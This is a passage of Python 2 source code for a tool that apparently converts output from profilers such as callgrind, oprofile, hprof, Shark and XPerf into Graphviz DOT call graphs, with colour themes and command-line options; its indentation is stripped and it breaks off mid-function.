events = values[self.num_positions : ]
events += ['0']*(self.num_events - len(events))
for i in range(self.num_positions):
position = positions[i]
if position == '*':
position = self.last_positions[i]
elif position[0] in '-+':
position = self.last_positions[i] + int(position)
elif position.startswith('0x'):
position = int(position, 16)
else:
position = int(position)
self.last_positions[i] = position
events = map(float, events)
if calls is None:
function[SAMPLES] += events[0]
self.profile[SAMPLES] += events[0]
else:
callee = self.get_callee()
callee.called += calls
try:
call = function.calls[callee.id]
except KeyError:
call = Call(callee.id)
call[CALLS] = calls
call[SAMPLES] = events[0]
function.add_call(call)
else:
call[CALLS] += calls
call[SAMPLES] += events[0]
self.consume()
return True
def parse_association_spec(self):
line = self.lookahead()
if not line.startswith('calls='):
return False
_, values = line.split('=', 1)
values = values.strip().split()
calls = int(values[0])
call_position = values[1:]
self.consume()
self.parse_cost_line(calls)
return True
_position_re = re.compile('^(?P<position>[cj]?(?:ob|fl|fi|fe|fn))=\s*(?:\((?P<id>\d+)\))?(?:\s*(?P<name>.+))?')
_position_table_map = {
'ob': 'ob',
'fl': 'fl',
'fi': 'fl',
'fe': 'fl',
'fn': 'fn',
'cob': 'ob',
'cfl': 'fl',
'cfi': 'fl',
'cfe': 'fl',
'cfn': 'fn',
'jfi': 'fl',
}
_position_map = {
'ob': 'ob',
'fl': 'fl',
'fi': 'fl',
'fe': 'fl',
'fn': 'fn',
'cob': 'cob',
'cfl': 'cfl',
'cfi': 'cfl',
'cfe': 'cfl',
'cfn': 'cfn',
'jfi': 'jfi',
}
def parse_position_spec(self):
line = self.lookahead()
if line.startswith('jump=') or line.startswith('jcnd='):
self.consume()
return True
mo = self._position_re.match(line)
if not mo:
return False
position, id, name = mo.groups()
if id:
table = self._position_table_map[position]
if name:
self.position_ids[(table, id)] = name
else:
name = self.position_ids.get((table, id), '')
self.positions[self._position_map[position]] = name
self.consume()
return True
def parse_empty(self):
if self.eof():
return False
line = self.lookahead()
if line.strip():
return False
self.consume()
return True
def parse_comment(self):
line = self.lookahead()
if not line.startswith('#'):
return False
self.consume()
return True
_key_re = re.compile(r'^(\w+):')
def parse_key(self, key):
pair = self.parse_keys((key,))
if not pair:
return None
key, value = pair
return value
line = self.lookahead()
mo = self._key_re.match(line)
if not mo:
return None
key, value = line.split(':', 1)
if key not in keys:
return None
value = value.strip()
self.consume()
return key, value
def parse_keys(self, keys):
line = self.lookahead()
mo = self._key_re.match(line)
if not mo:
return None
key, value = line.split(':', 1)
if key not in keys:
return None
value = value.strip()
self.consume()
return key, value
def make_function(self, module, filename, name):
# FIXME: module and filename are not being tracked reliably
#id = '|'.join((module, filename, name))
id = name
try:
function = self.profile.functions[id]
except KeyError:
function = Function(id, name)
function[SAMPLES] = 0
function.called = 0
self.profile.add_function(function)
return function
def get_function(self):
module = self.positions.get('ob', '')
filename = self.positions.get('fl', '')
function = self.positions.get('fn', '')
return self.make_function(module, filename, function)
def get_callee(self):
module = self.positions.get('cob', '')
filename = self.positions.get('cfi', '')
function = self.positions.get('cfn', '')
return self.make_function(module, filename, function)
class OprofileParser(LineParser):
"""Parser for oprofile callgraph output.
See also:
- http://oprofile.sourceforge.net/doc/opreport.html#opreport-callgraph
"""
_fields_re = {
'samples': r'(\d+)',
'%': r'(\S+)',
'linenr info': r'(?P<source>\(no location information\)|\S+:\d+)',
'image name': r'(?P<image>\S+(?:\s\(tgid:[^)]*\))?)',
'app name': r'(?P<application>\S+)',
'symbol name': r'(?P<symbol>\(no symbols\)|.+?)',
}
def __init__(self, infile):
LineParser.__init__(self, infile)
self.entries = {}
self.entry_re = None
def add_entry(self, callers, function, callees):
try:
entry = self.entries[function.id]
except KeyError:
self.entries[function.id] = (callers, function, callees)
else:
callers_total, function_total, callees_total = entry
self.update_subentries_dict(callers_total, callers)
function_total.samples += function.samples
self.update_subentries_dict(callees_total, callees)
def update_subentries_dict(self, totals, partials):
for partial in partials.itervalues():
try:
total = totals[partial.id]
except KeyError:
totals[partial.id] = partial
else:
total.samples += partial.samples
def parse(self):
# read lookahead
self.readline()
self.parse_header()
while self.lookahead():
self.parse_entry()
profile = Profile()
reverse_call_samples = {}
# populate the profile
profile[SAMPLES] = 0
for _callers, _function, _callees in self.entries.itervalues():
function = Function(_function.id, _function.name)
function[SAMPLES] = _function.samples
profile.add_function(function)
profile[SAMPLES] += _function.samples
if _function.application:
function.process = os.path.basename(_function.application)
if _function.image:
function.module = os.path.basename(_function.image)
total_callee_samples = 0
for _callee in _callees.itervalues():
total_callee_samples += _callee.samples
for _callee in _callees.itervalues():
if not _callee.self:
call = Call(_callee.id)
call[SAMPLES2] = _callee.samples
function.add_call(call)
# compute derived data
profile.validate()
profile.find_cycles()
profile.ratio(TIME_RATIO, SAMPLES)
profile.call_ratios(SAMPLES2)
profile.integrate(TOTAL_TIME_RATIO, TIME_RATIO)
return profile
def parse_header(self):
while not self.match_header():
self.consume()
line = self.lookahead()
fields = re.split(r'\s\s+', line)
entry_re = r'^\s*' + r'\s+'.join([self._fields_re[field] for field in fields]) + r'(?P<self>\s+\[self\])?$'
self.entry_re = re.compile(entry_re)
self.skip_separator()
def parse_entry(self):
callers = self.parse_subentries()
if self.match_primary():
function = self.parse_subentry()
if function is not None:
callees = self.parse_subentries()
self.add_entry(callers, function, callees)
self.skip_separator()
def parse_subentries(self):
subentries = {}
while self.match_secondary():
subentry = self.parse_subentry()
subentries[subentry.id] = subentry
return subentries
def parse_subentry(self):
entry = Struct()
line = self.consume()
mo = self.entry_re.match(line)
if not mo:
raise ParseError('failed to parse', line)
fields = mo.groupdict()
entry.samples = int(mo.group(1))
if 'source' in fields and fields['source'] != '(no location information)':
source = fields['source']
filename, lineno = source.split(':')
entry.filename = filename
entry.lineno = int(lineno)
else:
source = ''
entry.filename = None
entry.lineno = None
entry.image = fields.get('image', '')
entry.application = fields.get('application', '')
if 'symbol' in fields and fields['symbol'] != '(no symbols)':
entry.symbol = fields['symbol']
else:
entry.symbol = ''
if entry.symbol.startswith('"') and entry.symbol.endswith('"'):
entry.symbol = entry.symbol[1:-1]
entry.id = ':'.join((entry.application, entry.image, source, entry.symbol))
entry.self = fields.get('self', None) != None
if entry.self:
entry.id += ':self'
if entry.symbol:
entry.name = entry.symbol
else:
entry.name = entry.image
return entry
def skip_separator(self):
while not self.match_separator():
self.consume()
self.consume()
def match_header(self):
line = self.lookahead()
return line.startswith('samples')
def match_separator(self):
line = self.lookahead()
return line == '-'*len(line)
def match_primary(self):
line = self.lookahead()
return not line[:1].isspace()
def match_secondary(self):
line = self.lookahead()
return line[:1].isspace()
class HProfParser(LineParser):
"""Parser for java hprof output
See also:
- http://java.sun.com/developer/technicalArticles/Programming/HPROF.html
"""
trace_re = re.compile(r'\t(.*)\((.*):(.*)\)')
trace_id_re = re.compile(r'^TRACE (\d+):$')
def __init__(self, infile):
LineParser.__init__(self, infile)
self.traces = {}
self.samples = {}
def parse(self):
# read lookahead
self.readline()
while not self.lookahead().startswith('------'): self.consume()
while not self.lookahead().startswith('TRACE '): self.consume()
self.parse_traces()
while not self.lookahead().startswith('CPU'):
self.consume()
self.parse_samples()
# populate the profile
profile = Profile()
profile[SAMPLES] = 0
functions = {}
# build up callgraph
for id, trace in self.traces.iteritems():
if not id in self.samples: continue
mtime = self.samples[id][0]
last = None
for func, file, line in trace:
if not func in functions:
function = Function(func, func)
function[SAMPLES] = 0
profile.add_function(function)
functions[func] = function
function = functions[func]
# allocate time to the deepest method in the trace
if not last:
function[SAMPLES] += mtime
profile[SAMPLES] += mtime
else:
c = function.get_call(last)
c[SAMPLES2] += mtime
last = func
# compute derived data
profile.validate()
profile.find_cycles()
profile.ratio(TIME_RATIO, SAMPLES)
profile.call_ratios(SAMPLES2)
profile.integrate(TOTAL_TIME_RATIO, TIME_RATIO)
return profile
def parse_traces(self):
while self.lookahead().startswith('TRACE '):
self.parse_trace()
def parse_trace(self):
l = self.consume()
mo = self.trace_id_re.match(l)
tid = mo.group(1)
last = None
trace = []
while self.lookahead().startswith('\t'):
l = self.consume()
match = self.trace_re.search(l)
if not match:
#sys.stderr.write('Invalid line: %s\n' % l)
break
else:
function_name, file, line = match.groups()
trace += [(function_name, file, line)]
self.traces[int(tid)] = trace
def parse_samples(self):
self.consume()
self.consume()
while not self.lookahead().startswith('CPU'):
rank, percent_self, percent_accum, count, traceid, method = self.lookahead().split()
self.samples[int(traceid)] = (int(count), method)
self.consume()
class SysprofParser(XmlParser):
def __init__(self, stream):
XmlParser.__init__(self, stream)
def parse(self):
objects = {}
nodes = {}
self.element_start('profile')
while self.token.type == XML_ELEMENT_START:
if self.token.name_or_data == 'objects':
assert not objects
objects = self.parse_items('objects')
elif self.token.name_or_data == 'nodes':
assert not nodes
nodes = self.parse_items('nodes')
else:
self.parse_value(self.token.name_or_data)
self.element_end('profile')
return self.build_profile(objects, nodes)
def parse_items(self, name):
assert name[-1] == 's'
items = {}
self.element_start(name)
while self.token.type == XML_ELEMENT_START:
id, values = self.parse_item(name[:-1])
assert id not in items
items[id] = values
self.element_end(name)
return items
def parse_item(self, name):
attrs = self.element_start(name)
id = int(attrs['id'])
values = self.parse_values()
self.element_end(name)
return id, values
def parse_values(self):
values = {}
while self.token.type == XML_ELEMENT_START:
name = self.token.name_or_data
value = self.parse_value(name)
assert name not in values
values[name] = value
return values
def parse_value(self, tag):
self.element_start(tag)
value = self.character_data()
self.element_end(tag)
if value.isdigit():
return int(value)
if value.startswith('"') and value.endswith('"'):
return value[1:-1]
return value
def build_profile(self, objects, nodes):
profile = Profile()
profile[SAMPLES] = 0
for id, object in objects.iteritems():
# Ignore fake objects (process names, modules, "Everything", "kernel", etc.)
if object['self'] == 0:
continue
function = Function(id, object['name'])
function[SAMPLES] = object['self']
profile.add_function(function)
profile[SAMPLES] += function[SAMPLES]
for id, node in nodes.iteritems():
# Ignore fake calls
if node['self'] == 0:
continue
# Find a non-ignored parent
parent_id = node['parent']
while parent_id != 0:
parent = nodes[parent_id]
caller_id = parent['object']
if objects[caller_id]['self'] != 0:
break
parent_id = parent['parent']
if parent_id == 0:
continue
callee_id = node['object']
assert objects[caller_id]['self']
assert objects[callee_id]['self']
function = profile.functions[caller_id]
samples = node['self']
try:
call = function.calls[callee_id]
except KeyError:
call = Call(callee_id)
call[SAMPLES2] = samples
function.add_call(call)
else:
call[SAMPLES2] += samples
# Compute derived events
profile.validate()
profile.find_cycles()
profile.ratio(TIME_RATIO, SAMPLES)
profile.call_ratios(SAMPLES2)
profile.integrate(TOTAL_TIME_RATIO, TIME_RATIO)
return profile
class SharkParser(LineParser):
"""Parser for MacOSX Shark output.
Author: tom@dbservice.com
"""
def __init__(self, infile):
LineParser.__init__(self, infile)
self.stack = []
self.entries = {}
def add_entry(self, function):
try:
entry = self.entries[function.id]
except KeyError:
self.entries[function.id] = (function, { })
else:
function_total, callees_total = entry
function_total.samples += function.samples
def add_callee(self, function, callee):
func, callees = self.entries[function.id]
try:
entry = callees[callee.id]
except KeyError:
callees[callee.id] = callee
else:
entry.samples += callee.samples
def parse(self):
self.readline()
self.readline()
self.readline()
self.readline()
match = re.compile(r'(?P<prefix>[|+ ]*)(?P<samples>\d+), (?P<symbol>[^,]+), (?P<image>.*)')
while self.lookahead():
line = self.consume()
mo = match.match(line)
if not mo:
raise ParseError('failed to parse', line)
fields = mo.groupdict()
prefix = len(fields.get('prefix', 0)) / 2 - 1
symbol = str(fields.get('symbol', 0))
image = str(fields.get('image', 0))
entry = Struct()
entry.id = ':'.join([symbol, image])
entry.samples = int(fields.get('samples', 0))
entry.name = symbol
entry.image = image
# adjust the callstack
if prefix < len(self.stack):
del self.stack[prefix:]
if prefix == len(self.stack):
self.stack.append(entry)
# if the callstack has had an entry, it's this functions caller
if prefix > 0:
self.add_callee(self.stack[prefix - 1], entry)
self.add_entry(entry)
profile = Profile()
profile[SAMPLES] = 0
for _function, _callees in self.entries.itervalues():
function = Function(_function.id, _function.name)
function[SAMPLES] = _function.samples
profile.add_function(function)
profile[SAMPLES] += _function.samples
if _function.image:
function.module = os.path.basename(_function.image)
for _callee in _callees.itervalues():
call = Call(_callee.id)
call[SAMPLES] = _callee.samples
function.add_call(call)
# compute derived data
profile.validate()
profile.find_cycles()
profile.ratio(TIME_RATIO, SAMPLES)
profile.call_ratios(SAMPLES)
profile.integrate(TOTAL_TIME_RATIO, TIME_RATIO)
return profile
class XPerfParser(Parser):
"""Parser for CSVs generted by XPerf, from Microsoft Windows Performance Tools.
"""
def __init__(self, stream):
Parser.__init__(self)
self.stream = stream
self.profile = Profile()
self.profile[SAMPLES] = 0
self.column = {}
def parse(self):
import csv
reader = csv.reader(
self.stream,
delimiter = ',',
quotechar = None,
escapechar = None,
doublequote = False,
skipinitialspace = True,
lineterminator = '\r\n',
quoting = csv.QUOTE_NONE)
it = iter(reader)
row = reader.next()
self.parse_header(row)
for row in it:
self.parse_row(row)
# compute derived data
self.profile.validate()
self.profile.find_cycles()
self.profile.ratio(TIME_RATIO, SAMPLES)
self.profile.call_ratios(SAMPLES2)
self.profile.integrate(TOTAL_TIME_RATIO, TIME_RATIO)
return self.profile
def parse_header(self, row):
for column in range(len(row)):
name = row[column]
assert name not in self.column
self.column[name] = column
def parse_row(self, row):
fields = {}
for name, column in self.column.iteritems():
value = row[column]
for factory in int, float:
try:
value = factory(value)
except ValueError:
pass
else:
break
fields[name] = value
process = fields['Process Name']
symbol = fields['Module'] + '!' + fields['Function']
weight = fields['Weight']
count = fields['Count']
function = self.get_function(process, symbol)
function[SAMPLES] += weight * count
self.profile[SAMPLES] += weight * count
stack = fields['Stack']
if stack != '?':
stack = stack.split('/')
assert stack[0] == '[Root]'
if stack[-1] != symbol:
# XXX: some cases the sampled function does not appear in the stack
stack.append(symbol)
caller = None
for symbol in stack[1:]:
callee = self.get_function(process, symbol)
if caller is not None:
try:
call = caller.calls[callee.id]
except KeyError:
call = Call(callee.id)
call[SAMPLES2] = count
caller.add_call(call)
else:
call[SAMPLES2] += count
caller = callee
def get_function(self, process, symbol):
function_id = process + '!' + symbol
try:
function = self.profile.functions[function_id]
except KeyError:
module, name = symbol.split('!', 1)
function = Function(function_id, name)
function.process = process
function.module = module
function[SAMPLES] = 0
self.profile.add_function(function)
return function
class SleepyParser(Parser):
"""Parser for GNU gprof output.
See also:
- http://www.codersnotes.com/sleepy/
- http://sleepygraph.sourceforge.net/
"""
def __init__(self, filename):
Parser.__init__(self)
from zipfile import ZipFile
self.database = ZipFile(filename)
self.symbols = {}
self.calls = {}
self.profile = Profile()
_symbol_re = re.compile(
r'^(?P<id>\w+)' +
r'\s+"(?P<module>[^"]*)"' +
r'\s+"(?P<procname>[^"]*)"' +
r'\s+"(?P<sourcefile>[^"]*)"' +
r'\s+(?P<sourceline>\d+)$'
)
def parse_symbols(self):
lines = self.database.read('symbols.txt').splitlines()
for line in lines:
mo = self._symbol_re.match(line)
if mo:
symbol_id, module, procname, sourcefile, sourceline = mo.groups()
function_id = ':'.join([module, procname])
try:
function = self.profile.functions[function_id]
except KeyError:
function = Function(function_id, procname)
function.module = module
function[SAMPLES] = 0
self.profile.add_function(function)
self.symbols[symbol_id] = function
def parse_callstacks(self):
lines = self.database.read("callstacks.txt").splitlines()
for line in lines:
fields = line.split()
samples = int(fields[0])
callstack = fields[1:]
callstack = [self.symbols[symbol_id] for symbol_id in callstack]
callee = callstack[0]
callee[SAMPLES] += samples
self.profile[SAMPLES] += samples
for caller in callstack[1:]:
try:
call = caller.calls[callee.id]
except KeyError:
call = Call(callee.id)
call[SAMPLES2] = samples
caller.add_call(call)
else:
call[SAMPLES2] += samples
callee = caller
def parse(self):
profile = self.profile
profile[SAMPLES] = 0
self.parse_symbols()
self.parse_callstacks()
# Compute derived events
profile.validate()
profile.find_cycles()
profile.ratio(TIME_RATIO, SAMPLES)
profile.call_ratios(SAMPLES2)
profile.integrate(TOTAL_TIME_RATIO, TIME_RATIO)
return profile
class AQtimeTable:
def __init__(self, name, fields):
self.name = name
self.fields = fields
self.field_column = {}
for column in range(len(fields)):
self.field_column[fields[column]] = column
self.rows = []
def __len__(self):
return len(self.rows)
def __iter__(self):
for values, children in self.rows:
fields = {}
for name, value in zip(self.fields, values):
fields[name] = value
children = dict([(child.name, child) for child in children])
yield fields, children
raise StopIteration
def add_row(self, values, children=()):
self.rows.append((values, children))
class AQtimeParser(XmlParser):
def __init__(self, stream):
XmlParser.__init__(self, stream)
self.tables = {}
def parse(self):
self.element_start('AQtime_Results')
self.parse_headers()
results = self.parse_results()
self.element_end('AQtime_Results')
return self.build_profile(results)
def parse_headers(self):
self.element_start('HEADERS')
while self.token.type == XML_ELEMENT_START:
self.parse_table_header()
self.element_end('HEADERS')
def parse_table_header(self):
attrs = self.element_start('TABLE_HEADER')
name = attrs['NAME']
id = int(attrs['ID'])
field_types = []
field_names = []
while self.token.type == XML_ELEMENT_START:
field_type, field_name = self.parse_table_field()
field_types.append(field_type)
field_names.append(field_name)
self.element_end('TABLE_HEADER')
self.tables[id] = name, field_types, field_names
def parse_table_field(self):
attrs = self.element_start('TABLE_FIELD')
type = attrs['TYPE']
name = self.character_data()
self.element_end('TABLE_FIELD')
return type, name
def parse_results(self):
self.element_start('RESULTS')
table = self.parse_data()
self.element_end('RESULTS')
return table
def parse_data(self):
rows = []
attrs = self.element_start('DATA')
table_id = int(attrs['TABLE_ID'])
table_name, field_types, field_names = self.tables[table_id]
table = AQtimeTable(table_name, field_names)
while self.token.type == XML_ELEMENT_START:
row, children = self.parse_row(field_types)
table.add_row(row, children)
self.element_end('DATA')
return table
def parse_row(self, field_types):
row = [None]*len(field_types)
children = []
self.element_start('ROW')
while self.token.type == XML_ELEMENT_START:
if self.token.name_or_data == 'FIELD':
field_id, field_value = self.parse_field(field_types)
row[field_id] = field_value
elif self.token.name_or_data == 'CHILDREN':
children = self.parse_children()
else:
raise XmlTokenMismatch("<FIELD ...> or <CHILDREN ...>", self.token)
self.element_end('ROW')
return row, children
def parse_field(self, field_types):
attrs = self.element_start('FIELD')
id = int(attrs['ID'])
type = field_types[id]
value = self.character_data()
if type == 'Integer':
value = int(value)
elif type == 'Float':
value = float(value)
elif type == 'Address':
value = int(value)
elif type == 'String':
pass
else:
assert False
self.element_end('FIELD')
return id, value
def parse_children(self):
children = []
self.element_start('CHILDREN')
while self.token.type == XML_ELEMENT_START:
table = self.parse_data()
assert table.name not in children
children.append(table)
self.element_end('CHILDREN')
return children
def build_profile(self, results):
assert results.name == 'Routines'
profile = Profile()
profile[TIME] = 0.0
for fields, tables in results:
function = self.build_function(fields)
children = tables['Children']
for fields, _ in children:
call = self.build_call(fields)
function.add_call(call)
profile.add_function(function)
profile[TIME] = profile[TIME] + function[TIME]
profile[TOTAL_TIME] = profile[TIME]
profile.ratio(TOTAL_TIME_RATIO, TOTAL_TIME)
return profile
def build_function(self, fields):
function = Function(self.build_id(fields), self.build_name(fields))
function[TIME] = fields['Time']
function[TOTAL_TIME] = fields['Time with Children']
#function[TIME_RATIO] = fields['% Time']/100.0
#function[TOTAL_TIME_RATIO] = fields['% with Children']/100.0
return function
def build_call(self, fields):
call = Call(self.build_id(fields))
call[TIME] = fields['Time']
call[TOTAL_TIME] = fields['Time with Children']
#call[TIME_RATIO] = fields['% Time']/100.0
#call[TOTAL_TIME_RATIO] = fields['% with Children']/100.0
return call
def build_id(self, fields):
return ':'.join([fields['Module Name'], fields['Unit Name'], fields['Routine Name']])
def build_name(self, fields):
# TODO: use more fields
return fields['Routine Name']
class PstatsParser:
"""Parser python profiling statistics saved with te pstats module."""
def __init__(self, *filename):
import pstats
try:
self.stats = pstats.Stats(*filename)
except ValueError:
import hotshot.stats
self.stats = hotshot.stats.load(filename[0])
self.profile = Profile()
self.function_ids = {}
def get_function_name(self, (filename, line, name)):
module = os.path.splitext(filename)[0]
module = os.path.basename(module)
return "%s:%d:%s" % (module, line, name)
def get_function(self, key):
try:
id = self.function_ids[key]
except KeyError:
id = len(self.function_ids)
name = self.get_function_name(key)
function = Function(id, name)
self.profile.functions[id] = function
self.function_ids[key] = id
else:
function = self.profile.functions[id]
return function
def parse(self):
self.profile[TIME] = 0.0
self.profile[TOTAL_TIME] = self.stats.total_tt
for fn, (cc, nc, tt, ct, callers) in self.stats.stats.iteritems():
callee = self.get_function(fn)
callee.called = nc
callee[TOTAL_TIME] = ct
callee[TIME] = tt
self.profile[TIME] += tt
self.profile[TOTAL_TIME] = max(self.profile[TOTAL_TIME], ct)
for fn, value in callers.iteritems():
caller = self.get_function(fn)
call = Call(callee.id)
if isinstance(value, tuple):
for i in xrange(0, len(value), 4):
nc, cc, tt, ct = value[i:i+4]
if CALLS in call:
call[CALLS] += cc
else:
call[CALLS] = cc
if TOTAL_TIME in call:
call[TOTAL_TIME] += ct
else:
call[TOTAL_TIME] = ct
else:
call[CALLS] = value
call[TOTAL_TIME] = ratio(value, nc)*ct
caller.add_call(call)
#self.stats.print_stats()
#self.stats.print_callees()
# Compute derived events
self.profile.validate()
self.profile.ratio(TIME_RATIO, TIME)
self.profile.ratio(TOTAL_TIME_RATIO, TOTAL_TIME)
return self.profile
class Theme:
def __init__(self,
bgcolor = (0.0, 0.0, 1.0),
mincolor = (0.0, 0.0, 0.0),
maxcolor = (0.0, 0.0, 1.0),
fontname = "Arial",
minfontsize = 10.0,
maxfontsize = 10.0,
minpenwidth = 0.5,
maxpenwidth = 4.0,
gamma = 2.2,
skew = 1.0):
self.bgcolor = bgcolor
self.mincolor = mincolor
self.maxcolor = maxcolor
self.fontname = fontname
self.minfontsize = minfontsize
self.maxfontsize = maxfontsize
self.minpenwidth = minpenwidth
self.maxpenwidth = maxpenwidth
self.gamma = gamma
self.skew = skew
def graph_bgcolor(self):
return self.hsl_to_rgb(*self.bgcolor)
def graph_fontname(self):
return self.fontname
def graph_fontsize(self):
return self.minfontsize
def node_bgcolor(self, weight):
return self.color(weight)
def node_fgcolor(self, weight):
return self.graph_bgcolor()
def node_fontsize(self, weight):
return self.fontsize(weight)
def edge_color(self, weight):
return self.color(weight)
def edge_fontsize(self, weight):
return self.fontsize(weight)
def edge_penwidth(self, weight):
return max(weight*self.maxpenwidth, self.minpenwidth)
def edge_arrowsize(self, weight):
return 0.5 * math.sqrt(self.edge_penwidth(weight))
def fontsize(self, weight):
return max(weight**2 * self.maxfontsize, self.minfontsize)
def color(self, weight):
weight = min(max(weight, 0.0), 1.0)
hmin, smin, lmin = self.mincolor
hmax, smax, lmax = self.maxcolor
if self.skew < 0:
raise ValueError("Skew must be greater than 0")
elif self.skew == 1.0:
h = hmin + weight*(hmax - hmin)
s = smin + weight*(smax - smin)
l = lmin + weight*(lmax - lmin)
else:
base = self.skew
h = hmin + ((hmax-hmin)*(-1.0 + (base ** weight)) / (base - 1.0))
s = smin + ((smax-smin)*(-1.0 + (base ** weight)) / (base - 1.0))
l = lmin + ((lmax-lmin)*(-1.0 + (base ** weight)) / (base - 1.0))
return self.hsl_to_rgb(h, s, l)
def hsl_to_rgb(self, h, s, l):
"""Convert a color from HSL color-model to RGB.
See also:
- http://www.w3.org/TR/css3-color/#hsl-color
"""
h = h % 1.0
s = min(max(s, 0.0), 1.0)
l = min(max(l, 0.0), 1.0)
if l <= 0.5:
m2 = l*(s + 1.0)
else:
m2 = l + s - l*s
m1 = l*2.0 - m2
r = self._hue_to_rgb(m1, m2, h + 1.0/3.0)
g = self._hue_to_rgb(m1, m2, h)
b = self._hue_to_rgb(m1, m2, h - 1.0/3.0)
# Apply gamma correction
r **= self.gamma
g **= self.gamma
b **= self.gamma
return (r, g, b)
def _hue_to_rgb(self, m1, m2, h):
if h < 0.0:
h += 1.0
elif h > 1.0:
h -= 1.0
if h*6 < 1.0:
return m1 + (m2 - m1)*h*6.0
elif h*2 < 1.0:
return m2
elif h*3 < 2.0:
return m1 + (m2 - m1)*(2.0/3.0 - h)*6.0
else:
return m1
TEMPERATURE_COLORMAP = Theme(
mincolor = (2.0/3.0, 0.80, 0.25), # dark blue
maxcolor = (0.0, 1.0, 0.5), # satured red
gamma = 1.0
)
PINK_COLORMAP = Theme(
mincolor = (0.0, 1.0, 0.90), # pink
maxcolor = (0.0, 1.0, 0.5), # satured red
)
GRAY_COLORMAP = Theme(
mincolor = (0.0, 0.0, 0.85), # light gray
maxcolor = (0.0, 0.0, 0.0), # black
)
BW_COLORMAP = Theme(
minfontsize = 8.0,
maxfontsize = 24.0,
mincolor = (0.0, 0.0, 0.0), # black
maxcolor = (0.0, 0.0, 0.0), # black
minpenwidth = 0.1,
maxpenwidth = 8.0,
)
class DotWriter:
"""Writer for the DOT language.
See also:
- "The DOT Language" specification
http://www.graphviz.org/doc/info/lang.html
"""
def __init__(self, fp):
self.fp = fp
def graph(self, profile, theme):
self.begin_graph()
fontname = theme.graph_fontname()
self.attr('graph', fontname=fontname, ranksep=0.25, nodesep=0.125)
self.attr('node', fontname=fontname, shape="box", style="filled", fontcolor="white", width=0, height=0)
self.attr('edge', fontname=fontname)
for function in profile.functions.itervalues():
labels = []
if function.process is not None:
labels.append(function.process)
if function.module is not None:
labels.append(function.module)
labels.append(function.name)
for event in TOTAL_TIME_RATIO, TIME_RATIO:
if event in function.events:
label = event.format(function[event])
labels.append(label)
if function.called is not None:
labels.append(u"%u\xd7" % (function.called,))
if function.weight is not None:
weight = function.weight
else:
weight = 0.0
label = '\n'.join(labels)
self.node(function.id,
label = label,
color = self.color(theme.node_bgcolor(weight)),
fontcolor = self.color(theme.node_fgcolor(weight)),
fontsize = "%.2f" % theme.node_fontsize(weight),
)
for call in function.calls.itervalues():
callee = profile.functions[call.callee_id]
labels = []
for event in TOTAL_TIME_RATIO, CALLS:
if event in call.events:
label = event.format(call[event])
labels.append(label)
if call.weight is not None:
weight = call.weight
elif callee.weight is not None:
weight = callee.weight
else:
weight = 0.0
label = '\n'.join(labels)
self.edge(function.id, call.callee_id,
label = label,
color = self.color(theme.edge_color(weight)),
fontcolor = self.color(theme.edge_color(weight)),
fontsize = "%.2f" % theme.edge_fontsize(weight),
penwidth = "%.2f" % theme.edge_penwidth(weight),
labeldistance = "%.2f" % theme.edge_penwidth(weight),
arrowsize = "%.2f" % theme.edge_arrowsize(weight),
)
self.end_graph()
def begin_graph(self):
self.write('digraph {\n')
def end_graph(self):
self.write('}\n')
def attr(self, what, **attrs):
self.write("\t")
self.write(what)
self.attr_list(attrs)
self.write(";\n")
def node(self, node, **attrs):
self.write("\t")
self.id(node)
self.attr_list(attrs)
self.write(";\n")
def edge(self, src, dst, **attrs):
self.write("\t")
self.id(src)
self.write(" -> ")
self.id(dst)
self.attr_list(attrs)
self.write(";\n")
def attr_list(self, attrs):
if not attrs:
return
self.write(' [')
first = True
for name, value in attrs.iteritems():
if first:
first = False
else:
self.write(", ")
self.id(name)
self.write('=')
self.id(value)
self.write(']')
def id(self, id):
if isinstance(id, (int, float)):
s = str(id)
elif isinstance(id, basestring):
if id.isalnum() and not id.startswith('0x'):
s = id
else:
s = self.escape(id)
else:
raise TypeError
self.write(s)
def color(self, (r, g, b)):
def float2int(f):
if f <= 0.0:
return 0
if f >= 1.0:
return 255
return int(255.0*f + 0.5)
return "#" + "".join(["%02x" % float2int(c) for c in (r, g, b)])
def escape(self, s):
s = s.encode('utf-8')
s = s.replace('\\', r'\\')
s = s.replace('\n', r'\n')
s = s.replace('\t', r'\t')
s = s.replace('"', r'\"')
return '"' + s + '"'
def write(self, s):
self.fp.write(s)
class Main:
"""Main program."""
themes = {
"color": TEMPERATURE_COLORMAP,
"pink": PINK_COLORMAP,
"gray": GRAY_COLORMAP,
"bw": BW_COLORMAP,
}
def main(self):
"""Main program."""
parser = optparse.OptionParser(
usage="\n\t%prog [options] [file] ...",
version="%%prog %s" % __version__)
parser.add_option(
'-o', '--output', metavar='FILE',
type="string", dest="output",
help="output filename [stdout]")
parser.add_option(
'-n', '--node-thres', metavar='PERCENTAGE',
type="float", dest="node_thres", default=0.5,
help="eliminate nodes below this threshold [default: %default]")
parser.add_option(
'-e', '--edge-thres', metavar='PERCENTAGE',
type="float", dest="edge_thres", default=0.1,
help="eliminate edges below this threshold [default: %default]")
parser.add_option(
'-f', '--format',
type="choice", choices=('prof', 'callgrind', 'oprofile', 'hprof', 'sysprof', 'pstats', 'shark', 'sleepy', 'aqtime', 'xperf'),
dest="format", default="prof",
help="profile format: prof, callgrind, oprofile, hprof, sysprof, shark, sleepy, aqtime, pstats, or xperf [default: %default]")
parser.add_option(
'-c', '--colormap',
type="choice", choices=('color', 'pink', 'gray', 'bw'),
dest="theme", default="color",
help="color map: color, pink, gray, or bw [default: %default]")
parser.add_option(
'-s', '--strip',
action="store_true",
dest="strip", default=False,
help="strip function parameters, template parameters, and const modifiers from demangled C++ function names")
parser.add_option(
'-w', '--wrap',
action="store_true",
dest="wrap", default=False,
help="wrap function names")
# add a new option to control skew of the colorization curve
parser.add_option(
'--skew',
type="float", dest="theme_skew", default=1.0,
help="skew the colorization curve. Values < 1.0 give more variety to lower percentages. Value > 1.0 give less variety to lower percentages")
(self.options, self.args) = parser.parse_args(sys.argv[1:])
if len(self.args) > 1 and self.options.format != 'pstats':
parser.error('incorrect number of arguments')
try:
self.theme = self.themes[self.options.theme]
except KeyError:
parser.error('invalid colormap \'%s\'' % self.options.theme)
# set skew on the theme now that it has been picked.
if self.options.theme_skew:
self.theme.skew = self.options.theme_skew
if self.options.format == 'prof':
if not self.args:
fp = sys.stdin
else:
fp = open(self.args[0], 'rt')
parser = GprofParser(fp)
elif self.options.format == 'callgrind':
if not self.args:
fp = sys.stdin
else:
fp = open(self.args[0], 'rt')
parser = CallgrindParser(fp)
elif self.options.format == 'oprofile':
if not self.args:
fp = sys.stdin
else:
fp = open(self.args[0], 'rt')
parser = OprofileParser(fp)
elif self.options.format == 'sysprof':
if not self.args:
